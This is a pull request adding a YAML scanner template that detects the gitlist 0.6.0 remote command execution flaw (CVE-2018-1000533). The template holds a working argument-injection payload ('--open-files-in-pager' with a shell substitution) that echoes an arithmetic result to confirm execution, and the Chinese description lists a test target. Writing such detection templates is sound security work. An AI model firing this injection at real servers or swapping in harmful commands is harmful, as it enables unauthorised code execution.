### PR TITLE
gitlist-rce-cve-2018-1000533

### DIFF
--- a/pocs/gitlist-rce-cve-2018-1000533.yml
+++ b/pocs/gitlist-rce-cve-2018-1000533.yml
@@ -1,0 +1,25 @@
+name: poc-yaml-gitlist-rce-cve-2018-1000533
+set:
+  r1: randomInt(800000000, 1000000000)
+  r2: randomInt(800000000, 1000000000)
+  r3: randomLowercase(8)
+rules:
+  - method: GET
+    path: /
+    search: |
+      <span class="name">(?P<project_name>.+?)</span>
+    expression: |
+      response.status == 200 && "gitlist".bmatches(response.body)
+  - method: POST
+    path: /{{project_name}}/tree/a/search
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: |
+      query=--open-files-in-pager=echo%20{{r3}}:$(expr%20{{r1}}%20%2b%20{{r2}}):{{r1}}:{{r1}}
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
+detail:
+  author: Print1n(https://print1n.top)
+  description: gitlist 0.6.0 远程命令执行漏洞（CVE-2018-1000533）
+  links:
+    - https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
gitlist 0.6.0 远程命令执行漏洞
## 测试环境
vulhub：https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533
漏洞靶场：http://82.156.247.54:8088/
## 备注
1. 与#1301相同，#1301使用的是反连平台，此POC采用的是命令执行回显
![image](https://user-images.githubusercontent.com/73928418/121987608-6581e980-cdcb-11eb-9ba5-113b90d21ec2.png)
